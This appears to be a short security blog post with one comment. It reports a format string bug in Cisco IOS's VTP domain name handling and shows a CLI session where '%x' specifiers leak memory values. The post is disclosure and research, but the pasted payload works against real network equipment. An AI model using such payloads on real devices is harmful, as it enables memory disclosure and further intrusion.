Something I came across while reproducing FX's VTP overflow vulnerability (http://www.phenoelit.de/stuff/CiscoVTP.txt). It looks like IOS does not implement the %n format specifier in their implementation of libc, so no format string exploits :( , however we can still use %x's to dump memory addresses. Below is a session dump of the bug, under the latest ipbase image -
Password:
reptile>en
Password:
reptile#vlan ?
database Configure VLAN database
reptile#vlan database
reptile(vlan)#?
VLAN database editing buffer manipulation commands:
abort Exit mode without applying the changes
apply Apply current changes and bump revision number
exit Apply changes, bump revision number, and exit mode
no Negate a command or set its defaults
reset Abandon current changes and reread current database
show Show database information
vlan Add, delete, or modify values associated with a single VLAN
vtp Perform VTP administrative functions.
reptile(vlan)#vtp ?
client Set the device to client mode.
domain Set the name of the VTP administrative domain.
password Set the password for the VTP administrative domain.
pruning Set the administrative domain to permit pruning.
server Set the device to server mode.
transparent Set the device to transparent mode.
v2-mode Set the administrative domain to V2 mode.
reptile(vlan)#
reptile(vlan)#
reptile(vlan)#vtp domain test(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)(%x)
Changing VTP domain name from test to (FFFFFFFF)(0)(839A3538)(0)(0)(8270652F)(FFFFFFFF)(839A34E0)(4)(839A3780)
reptile(vlan)#
reptile(vlan)#
reptile(vlan)#exit
APPLY completed.
Exiting....
reptile#exit
1 comment :
Interesting.
Have you looked at the printf formatstring parsing itself ? Quite often some things are broken there too so that exploitation is still possible.
Post a Comment